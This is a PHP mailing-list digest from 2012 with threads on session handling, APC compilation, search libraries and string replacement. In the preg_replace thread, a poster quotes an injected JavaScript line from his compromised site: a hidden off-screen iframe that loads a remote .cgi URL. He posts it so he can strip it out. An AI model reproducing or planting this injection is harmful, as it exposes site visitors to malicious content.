php-general Digest 13 Dec 2012 13:49:56 -0000 Issue 8064

Topics (messages 319849 through 319867):

Php application with session used in a cluster
        319849 by: Jan Vávra
        319858 by: Jim Lucas

Re: Lucene library
        319850 by: marco.behnke.biz

Compile APC in PHP 5.2
        319851 by: Alexander Diedler
        319852 by: Sebastian Krebs

Re: Session ?
        319853 by: Jim Giner
        319866 by: marco.behnke.biz
        319867 by: Jim Giner

preg_replace question
        319854 by: Curtis Maurand
        319855 by: Maciek Sokolewicz
        319857 by: Ashley Sheridan
        319860 by: Curtis Maurand
        319862 by: Maciek Sokolewicz
        319864 by: Curtis Maurand
        319865 by: Simon J Welsh

storing & searching docs
        319856 by: Jim Giner
        319859 by: Paul M Foster
        319861 by: Maciek Sokolewicz
        319863 by: Maciek Sokolewicz

Administrivia:

To subscribe to the digest, e-mail:
        php-general-digest-subscr...@lists.php.net

To unsubscribe from the digest, e-mail:
        php-general-digest-unsubscr...@lists.php.net

To post to the list, e-mail:
        php-gene...@lists.php.net


----------------------------------------------------------------------
--- Begin Message ---
Hello,
we are considering to use a php on several application servers behind the apache mod_proxy_balancer. Our php app is using session cookies. And we would like to use session stickyness - once the user connects to app server X and gets the session cookie, all other request will be ballanced (reverse proxied) to the app server X. We have these theoretical possibilities:

1. Into each response add own Set-Cookie: Cluster-Node=blabla.X
When user continues requesting the apache balancer the balancer knows to which app server redirect. From the value of own cookie Cluster-Node= reads the value X identifying the app server X. Problem: Does exist in the php framework something like .net post request handler? For better understanding replace the word /post by //after/. So after the request is processed by the php application code the "post request handler" is fired and calls header("Cluster-Node=blabla.X")

2. Modify the php session management system.
We need to add to php session value string ".X". Is there a way how to do it?

3. Write an own session management system for a single app server or for all of them.
The most work-intensive option ;-(

My resource is a paragraph from Apache mod proxy balancer manual
http://httpd.apache.org/docs/2.2/mod/mod_proxy_balancer.html

Some back-ends use a slightly different form of stickyness cookie, for instance Apache Tomcat. Tomcat adds the name of the Tomcat instance to the end of its session id cookie, separated with a dot (|.|) from the session id. Thus if the Apache web server finds a dot in the value of the stickyness cookie, it only uses the part behind the dot to search for the route. In order to let Tomcat know about its instance name, you need to set the attribute |jvmRoute| inside the Tomcat configuration file |conf/server.xml| to the value of the route of the worker that connects to the respective Tomcat. The name of the session cookie used by Tomcat (and more generally by Java web applications based on servlets) is |JSESSIONID| (upper case) but can be configured to something else.

And the last possibility is:
4. Can apache mod_proxy_balancer stick cookies by the session cookie name?
Each app server can have its own session.cookie_name=PHPSESSION-X. But it is a query for a different forum...

Can anybody give me an advice?

Thanks.
Jan.

--- End Message ---
--- Begin Message ---
On 12/12/2012 05:19 AM, Jan Vávra wrote:
Hello,
we are considering to use a php on several application servers behind
the apache mod_proxy_balancer. Our php app is using session cookies. And
we would like to use session stickyness - once the user connects to app
server X and gets the session cookie, all other request will be
ballanced (reverse proxied) to the app server X. We have these
theoretical possibilities:


[...]


Can anybody give me an advice?

Why not use database driven sessions? Their are many examples on the net of how to setup such a system to replace the file based system used by default.


Thanks.
Jan.



--
Jim Lucas

http://www.cmsws.com/
http://www.cmsws.com/examples/

--- End Message ---
--- Begin Message ---

Louis Huppenbauer <louis.huppenba...@gmail.com> hat am 12. Dezember 2012 um
07:07 geschrieben:
> There's Zend_Search_Lucene, part of the Zend framework. I think it should
> be possible to use it without the whole framework though.
>
> http://framework.zend.com/manual/1.12/de/zend.search.lucene.html


see
http://www.phpgangsta.de/die-eigene-suchmaschine-in-php-leicht-gemacht-lucene

>
>
> 2012/12/12 Larry Garfield <la...@garfieldtech.com>
>
> > Yes, I've worked with Apache Solr quite a bit.  It's a separate server,
> > however, and I'm looking for something with smaller requirements for a
> > concept I want to try. I'd consider SQLite, but I really need something
> > schema-free and PHP-native/easily-installable.
> >
> > --Larry Garfield
> >
> >
> > On 12/11/2012 07:20 PM, israele...@gmail.com wrote:
> >
> >> Check out apache solr.
> >>
> >> The php implementation of Lucene was very slow and had a lot of
> >> perfomance issues the last time I tried it
> >> ------Original Message------
> >> From: Larry Garfield
> >> To: php-gene...@lists.php.net
> >> Subject: [PHP] Lucene library
> >> Sent: Dec 11, 2012 5:41 PM
> >>
> >> Hi all.
> >>
> >> I recall hearing about there being a PHP port of the Lucene library some
> >> years ago, but I don't recall whence it came.  It was a stand-alone PHP
> >> lib, which needed some integration to be viable as an actual search
> >> engine but worked up to a point by storing data straight on disk as
> >> files.  That meant it didn't scale beyond a few tens of thousands of
> >> records, but that's still a decent number.
> >>
> >> Does that ring a bell for anyone?  Anyone know if it still exists, and
> >> if so where?  I didn't find it in https://packagist.org/ , which is
> >> where I figured it would be if it were still maintained.
> >>
> >> I may have a use for it if it still exists.
> >>
> >> --Larry Garfield
> >>
> >>
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >

--
Marco Behnke
Dipl. Informatiker (FH), SAE Audio Engineer Diploma
Zend Certified Engineer PHP 5.3

Tel.: 0174 / 9722336
e-Mail: ma...@behnke.biz

Softwaretechnik Behnke
Heinrich-Heine-Str. 7D
21218 Seevetal

http://www.behnke.biz

--- End Message ---
--- Begin Message ---
Hello,
I try to get APC working for a compiled PHP 5.2.17. 
On this Ubuntu, we have an PHP 5.3 installed with APT-GET and a PHP 5.2 as CGI 
module compiled with make etc.
In the PHP 5.3 I got APC running in phpinfo, but not in PHP 5.2, what we have 
to do to get work it?

I use this 
http://de2.php.net/manual/de/install.pecl.static.php
but if I use the configure with 
./configure --prefix=/opt/php5.2 --with-config-file-path=/opt/php5.2 
--with-mysqli --with-mysql --with-pdo-mysql --with-curl --with-gd 
--with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr --enable-cli 
--enable-fastcgi --enable-discard-path --enable-force-cgi-redirect 
--enable-mbstring --with-bz2 --enable-gd-native-ttf --enable-calendar 
--with-gmp --enable-bcmath --with-xpm-dir=/usr --enable-soap --with-openssl 
--with-zlib --with-apc
There are only errors in the configure and it seems, that buildconf destroy the 
configure file.

I try also 
http://www.linuxask.com/questions/how-to-compile-apc-module-for-php
but if I add extension=apc.so and restart, it will not be shown in phpinfo.



Best regards
Alexander




--- End Message ---
--- Begin Message ---
Hi,

You should definitely not use PHP5.2 anymore.

Regards,
Sebastian


2012/12/12 Alexander Diedler <adied...@tecracer.de>

> Hello,
> I try to get APC working for a compiled PHP 5.2.17.
> On this Ubuntu, we have an PHP 5.3 installed with APT-GET and a PHP 5.2 as
> CGI module compiled with make etc.
> In the PHP 5.3 I got APC running in phpinfo, but not in PHP 5.2, what we
> have to do to get work it?
>
> I use this
> http://de2.php.net/manual/de/install.pecl.static.php
> but if I use the configure with
> ./configure --prefix=/opt/php5.2 --with-config-file-path=/opt/php5.2
> --with-mysqli --with-mysql --with-pdo-mysql --with-curl --with-gd
> --with-jpeg-dir=/usr --with-png-dir=/usr --with-freetype-dir=/usr
> --enable-cli --enable-fastcgi --enable-discard-path
> --enable-force-cgi-redirect --enable-mbstring --with-bz2
> --enable-gd-native-ttf --enable-calendar --with-gmp --enable-bcmath
> --with-xpm-dir=/usr --enable-soap --with-openssl --with-zlib --with-apc
> There are only errors in the configure and it seems, that buildconf
> destroy the configure file.
>
> I try also
> http://www.linuxask.com/questions/how-to-compile-apc-module-for-php
> but if I add extension=apc.so and restart, it will not be shown in phpinfo.
>
>
>
> Best regards
> Alexander
>
>
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>


-- 
github.com/KingCrunch

--- End Message ---
--- Begin Message ---
On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:


Jim Giner <jim.gi...@albanyhandball.com> hat am 12. Dezember 2012 um 02:53
geschrieben:
On 12/11/2012 7:27 PM, Marco Behnke wrote:
Am 08.12.12 19:08, schrieb Jim Giner:
All my debugging messages indicagte that I have the same session id,
yet I don't have the same variables, ie, they're missing.
Just to be sure ... the webspace is on the same server and has access to
the same directory where the session data is stored? (session_save_path)?


Yes - it points to a folder within my main domain's structure.

which is accessible from your subdomains?


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


--
Marco Behnke
Dipl. Informatiker (FH), SAE Audio Engineer Diploma
Zend Certified Engineer PHP 5.3

Tel.: 0174 / 9722336
e-Mail: ma...@behnke.biz

Softwaretechnik Behnke
Heinrich-Heine-Str. 7D
21218 Seevetal

http://www.behnke.biz

They are all pointing (re the ini file) to the default of /tmp so I presume that they all have access to that folder.
--- End Message ---
--- Begin Message ---
Am 12.12.12 15:58, schrieb Jim Giner:
> On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:
>>
>>
>> Jim Giner <jim.gi...@albanyhandball.com> hat am 12. Dezember 2012 um
>> 02:53
>> geschrieben:
>>> On 12/11/2012 7:27 PM, Marco Behnke wrote:
>>>> Am 08.12.12 19:08, schrieb Jim Giner:
>>>>> All my debugging messages indicagte that I have the same session id,
>>>>> yet I don't have the same variables, ie, they're missing.
>>>> Just to be sure ... the webspace is on the same server and has
>>>> access to
>>>> the same directory where the session data is stored?
>>>> (session_save_path)?
>>>>
>>>>
>>> Yes - it points to a folder within my main domain's structure.
>>
>> which is accessible from your subdomains?
>>
>>>
> They are all pointing (re the ini file) to the default of /tmp so I
> presume that they all have access to that folder.

Ok, that is a different answer from the previous one where you said "it
points to a folder within my main domain's structure"

Are you running on error_reporting(E_ALL) and ini_set('display_errors',
'On')?
Just to be sure that there are no hidden notices or warnings.


-- 
Marco Behnke
Dipl. Informatiker (FH), SAE Audio Engineer Diploma
Zend Certified Engineer PHP 5.3

Tel.: 0174 / 9722336
e-Mail: ma...@behnke.biz

Softwaretechnik Behnke
Heinrich-Heine-Str. 7D
21218 Seevetal

http://www.behnke.biz


Attachment: signature.asc
Description: OpenPGP digital signature


--- End Message ---
--- Begin Message ---
On 12/12/2012 5:25 PM, Marco Behnke wrote:
Am 12.12.12 15:58, schrieb Jim Giner:
On 12/12/2012 8:08 AM, ma...@behnke.biz wrote:


Jim Giner <jim.gi...@albanyhandball.com> hat am 12. Dezember 2012 um
02:53
geschrieben:
On 12/11/2012 7:27 PM, Marco Behnke wrote:
Am 08.12.12 19:08, schrieb Jim Giner:
All my debugging messages indicagte that I have the same session id,
yet I don't have the same variables, ie, they're missing.
Just to be sure ... the webspace is on the same server and has
access to
the same directory where the session data is stored?
(session_save_path)?


Yes - it points to a folder within my main domain's structure.

which is accessible from your subdomains?


They are all pointing (re the ini file) to the default of /tmp so I
presume that they all have access to that folder.

Ok, that is a different answer from the previous one where you said "it
points to a folder within my main domain's structure"

Are you running on error_reporting(E_ALL) and ini_set('display_errors',
'On')?
Just to be sure that there are no hidden notices or warnings.


my sub points to a folder within my domain's structure. My session's store point (?) is \tmp. You asked two different questions.
--- End Message ---
--- Begin Message --- I have several poisoned .js files on a server. I can use find to recursively find them and then use preg_replace to replace the string. However the string is filled with single quotes, semi-colons and a lot of other special characters. Will preg_relace(escapeshellarg($String),$replacement) work or do I need to go through the entire string and escape what needs to be escaped?

--C

--- End Message ---
--- Begin Message ---
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_relace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead.

Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it.

- Tul

--- End Message ---
--- Begin Message ---

Maciek Sokolewicz <maciek.sokolew...@gmail.com> wrote:

>On 12-12-2012 17:11, Curtis Maurand wrote:
>> I have several poisoned .js files on a server.  I can use find to
>> recursively find them and then use preg_replace to replace the
>string.
>> However the string is filled with single quotes, semi-colons and a
>lot
>> of other special characters.  Will
>> preg_relace(escapeshellarg($String),$replacement) work or do I need
>to
>> go through the entire string and escape what needs to be escaped?
>>
>> --C
>
>First of all, why do you want to use preg_replace when you're not 
>actually using regular expressions??? Use str_replace or stri_replace 
>instead.
>
>Aside from that, escapeshellarg() escapes strings for use in shell 
>execution. Perl Regexps are not shell commands. It's like using 
>mysqli_real_escape_string() to escape arguments for URLs. That doesn't 
>compute, just like your way doesn't either.
>
>If you DO wish to escape arguments for a regular expression, use 
>preg_quote instead, that's what it's there for. But first, reconsider 
>using preg_replace, since I honestly don't think you need it at all if 
>the way you've posted 
>(preg_replace(escapeshellarg($string),$replacement)) is the way you
>want 
>to use it.
>
>- Tul

Sometimes if all you know is preg_replace(), everything looks like a nail...

-- 
Sent from my Android phone with K-9 Mail. Please excuse my brevity.

--- End Message ---
--- Begin Message ---
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_relace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not actually using regular expressions??? Use str_replace or stri_replace instead.

Aside from that, escapeshellarg() escapes strings for use in shell execution. Perl Regexps are not shell commands. It's like using mysqli_real_escape_string() to escape arguments for URLs. That doesn't compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use preg_quote instead, that's what it's there for. But first, reconsider using preg_replace, since I honestly don't think you need it at all if the way you've posted (preg_replace(escapeshellarg($string),$replacement)) is the way you want to use it.
Thanks for your response. I'm open to to using str_replace. no issue there. my main question was how to properly get a string of javascript into a string that could then be processed. I'm not sure I can just put that in quotes and have it work. There are colons, "<",">", semicolons, and doublequotes. Do I just need to rifle through the string and escape the reserved characters or is there a function for that?

--C

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:10, Curtis Maurand wrote:
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_relace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not
actually using regular expressions??? Use str_replace or stri_replace
instead.

Aside from that, escapeshellarg() escapes strings for use in shell
execution. Perl Regexps are not shell commands. It's like using
mysqli_real_escape_string() to escape arguments for URLs. That doesn't
compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use
preg_quote instead, that's what it's there for. But first, reconsider
using preg_replace, since I honestly don't think you need it at all if
the way you've posted
(preg_replace(escapeshellarg($string),$replacement)) is the way you
want to use it.
Thanks for your response.  I'm open to to using str_replace.  no issue
there.  my main question was how to properly get a string of javascript
into a string that could then be processed.  I'm not sure I can just put
that in quotes and have it work.    There are colons, "<",">",
semicolons, and doublequotes.  Do I just need to rifle through the
string and escape the reserved characters or is there a function for that?

--C

Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example:

$string = 'This is a <string with various supposedly "reserved" ``\\ _- characters'
echo str_replace('supposedly', 'imaginary', $string)
would return:
This is a <string with imaginary "reserved" ``\\- characters

So... why do you want to "escape" these characters?

--- End Message ---
--- Begin Message ---
On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote:
On 12-12-2012 21:10, Curtis Maurand wrote:
On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
On 12-12-2012 17:11, Curtis Maurand wrote:
I have several poisoned .js files on a server.  I can use find to
recursively find them and then use preg_replace to replace the string.
However the string is filled with single quotes, semi-colons and a lot
of other special characters.  Will
preg_relace(escapeshellarg($String),$replacement) work or do I need to
go through the entire string and escape what needs to be escaped?

--C

First of all, why do you want to use preg_replace when you're not
actually using regular expressions??? Use str_replace or stri_replace
instead.

Aside from that, escapeshellarg() escapes strings for use in shell
execution. Perl Regexps are not shell commands. It's like using
mysqli_real_escape_string() to escape arguments for URLs. That doesn't
compute, just like your way doesn't either.

If you DO wish to escape arguments for a regular expression, use
preg_quote instead, that's what it's there for. But first, reconsider
using preg_replace, since I honestly don't think you need it at all if
the way you've posted
(preg_replace(escapeshellarg($string),$replacement)) is the way you
want to use it.
Thanks for your response.  I'm open to to using str_replace.  no issue
there.  my main question was how to properly get a string of javascript
into a string that could then be processed.  I'm not sure I can just put
that in quotes and have it work.    There are colons, "<",">",
semicolons, and doublequotes.  Do I just need to rifle through the
string and escape the reserved characters or is there a function for that?

--C

Why do you want to escape them? There are no reserved characters in the case of str_replace. You don't have to put anything in quotes. For example:

$string = 'This is a <string with various supposedly "reserved" ``\\ _- characters'
echo str_replace('supposedly', 'imaginary', $string)
would return:
This is a <string with imaginary "reserved" ``\\- characters

So... why do you want to "escape" these characters?

So what about things like quotes within the string or semi-colons, colons and slashes? Don't these need to be escaped when you're loading a string into a variable?

;document.write('<iframe width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');

I need to enclose this entire string and replace it with ""

Thanks

--- End Message ---
--- Begin Message ---
On 13/12/2012, at 10:08 AM, Curtis Maurand <cur...@maurand.com> wrote:
> On 12/12/2012 3:47 PM, Maciek Sokolewicz wrote:
>> On 12-12-2012 21:10, Curtis Maurand wrote:
>>> On 12/12/2012 12:00 PM, Maciek Sokolewicz wrote:
>>>> On 12-12-2012 17:11, Curtis Maurand wrote:
>>>> 
>>>> First of all, why do you want to use preg_replace when you're not
>>>> actually using regular expressions??? Use str_replace or stri_replace
>>>> instead.
>>>> 
>>>> Aside from that, escapeshellarg() escapes strings for use in shell
>>>> execution. Perl Regexps are not shell commands. It's like using
>>>> mysqli_real_escape_string() to escape arguments for URLs. That doesn't
>>>> compute, just like your way doesn't either.
>>>> 
>>>> If you DO wish to escape arguments for a regular expression, use
>>>> preg_quote instead, that's what it's there for. But first, reconsider
>>>> using preg_replace, since I honestly don't think you need it at all if
>>>> the way you've posted
>>>> (preg_replace(escapeshellarg($string),$replacement)) is the way you
>>>> want to use it.
>>> Thanks for your response.  I'm open to to using str_replace.  no issue
>>> there.  my main question was how to properly get a string of javascript
>>> into a string that could then be processed.  I'm not sure I can just put
>>> that in quotes and have it work.    There are colons, "<",">",
>>> semicolons, and doublequotes.  Do I just need to rifle through the
>>> string and escape the reserved characters or is there a function for that?
>>> 
>>> --C
>> 
>> Why do you want to escape them? There are no reserved characters in the case 
>> of str_replace. You don't have to put anything in quotes. For example:
>> 
>> $string = 'This is a <string with various supposedly "reserved" ``\\ _- 
>> characters'
>> echo str_replace('supposedly', 'imaginary', $string)
>> would return:
>> This is a <string with imaginary "reserved" ``\\- characters
>> 
>> So... why do you want to "escape" these characters?
>> 
> So what about things like quotes within the string or semi-colons, colons and 
> slashes?  Don't these need to be escaped when you're loading a string into a 
> variable?
> 
> ;document.write('<iframe width="50" height="50" 
> style="width:100px;height:100px;position:absolute;left:-100px;top:0;" 
> src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
> 
> I need to enclose this entire string and replace it with ""
> 
> Thanks


The only thing you have to worry about is quotes characters. Assuming you're 
running 5.3+, just use now docs 
(http://php.net/manual/en/language.types.string.php#language.types.string.syntax.nowdoc).

$String = <<<'STRING'
;document.write('<iframe width="50" height="50" 
style="width:100px;height:100px;position:absolute;left:-100px;top:0;" 
src="http://nrwhuejbd.freewww.com/34e2b2349bdf29216e455cbc7b6491aa.cgi??8";></iframe>');
STRING;
---
Simon Welsh
Admin of http://simon.geek.nz/



--- End Message ---
--- Begin Message ---
Slightly off-topic perhaps but I'm looking for general input here.

New idea for a project - save the minutes of my firehouse meetings into a mysql table and build a ui to search them for words and such. The docs are written in Word currently. My simplistic idea is to perhaps convert them to something other than Word format and then to store them into a field of a mysql record with the meeting date as a key field. Of course having them online I should also allow for viewing as a document in something close to their original (?) format.

Any ideas - pro or con - on this idea?

--- End Message ---
--- Begin Message ---
On Wed, Dec 12, 2012 at 01:00:41PM -0500, Jim Giner wrote:

> Slightly off-topic perhaps but I'm looking for general input here.
> 
> New idea for a project - save the minutes of my firehouse meetings
> into a mysql table and build a ui to search them for words and such.
> The docs are written in Word currently.  My simplistic idea is to
> perhaps convert them to something other than Word format and then to
> store them into a field of a mysql record with the meeting date as a
> key field.
> Of course having them online I should also allow for viewing as a
> document in something close to their original (?) format.
> 
> Any ideas - pro or con - on this idea?

First off, I'd convert them to RTF (rich text format). Word format is
too ephemeral ( = self-incompatible). RTF is a lowest common denomenator
which can be converted to a variety of other formats. And RTF is a
standardized format that both Word and things like Open Office both
understand. The formatting for meeting minutes don't dictate a very
complicated layout (something that RTF isn't that good with). I would
suggest HTML format, but Word is notoriously atrocious at faithfully
converting its own formats into HTML. The result is horrid.

Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).

Paul

-- 
Paul M. Foster
http://noferblatz.com
http://quillandmouse.com

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:03, Paul M Foster wrote:
Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).

Paul


I actually disagree on this point. In the past, storing data in a database would make the entire database-system extremely slow and would eat up memory. These days, most database-systems can be (or even are) optimized to actually not do this anymore.

One positive aspect of storing such data in a database is the ability to search using full-text searches. For example, you could use the Sphinx Search Engine, which integrates into MySQL very well. It makes searching for specific words, phrases, etc. very simple and VERY fast.

So in this case, storing it in a database WOULD actually be a good idea IMO.

- Tul

--- End Message ---
--- Begin Message ---
On 12-12-2012 21:40, Maciek Sokolewicz wrote:
On 12-12-2012 21:03, Paul M Foster wrote:
Second, you've hit on one of my pet peeves. Never never store huge
blocks of text in SQL files. It slows them down and there's no real
reason for it. There's no reason to force a DBMS to schlep around
massive clumps of text or binary data. That's what disk file systems are
for. Store the target data in a file and store a reference to the
location of the data in the SQL database. Or perhaps, use a NoSQL
solution. I don't know much about the internals of nosql systems, but I
would hope that the metadata about the text objects would be stored
separately from the "payload" (text object).

Paul


I actually disagree on this point. In the past, storing data in a
database would make the entire database-system extremely slow and would
eat up memory. These days, most database-systems can be (or even are)
optimized to actually not do this anymore.

One positive aspect of storing such data in a database is the ability to
search using full-text searches. For example, you could use the Sphinx
Search Engine, which integrates into MySQL very well. It makes searching
for specific words, phrases, etc. very simple and VERY fast.

So in this case, storing it in a database WOULD actually be a good idea
IMO.

- Tul

Actually, I have to come back on that one. You could also store it locally in files, and feed it into the searchd daemon manually.


--- End Message ---

Reply via email to